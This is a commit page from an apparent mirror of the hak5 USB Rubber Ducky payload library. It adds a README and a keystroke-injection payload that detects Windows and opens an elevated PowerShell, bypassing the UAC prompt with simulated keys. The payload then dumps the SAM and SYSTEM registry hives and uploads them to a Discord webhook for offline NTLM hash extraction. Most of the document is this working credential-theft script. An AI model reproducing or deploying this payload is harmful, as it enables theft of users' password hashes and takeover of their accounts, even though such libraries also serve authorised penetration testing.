hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #484 from luu176/master 

Exfiltrate NTLM hash using DS3
pull/425/merge
Peaks 2024-09-24 19:27:52 -04:00 committed by GitHub
parent adb9af43f8 0df3011601
commit 675972662a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 62 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
payloads/library/exfiltration/ntlm_exfiltration/README.md Normal file
View File

@ -0,0 +1,28 @@
# Exfiltrate NTLM Hash - Windows ✅
A script used to exfiltrate the NTLM hash on a Windows machine.
## Description
A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
### Settings
* Set the Discord webhook URL
* Ensure the webhook permissions are configured
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>

34
payloads/library/exfiltration/ntlm_exfiltration/payload.txt Normal file
View File

@ -0,0 +1,34 @@
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
END_EXTENSION
DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
GUI d
DELAY 1000
GUI r
DELAY 1000
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 3000
LEFTARROW
ENTER
DELAY 3000
STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
DELAY 500
GUI d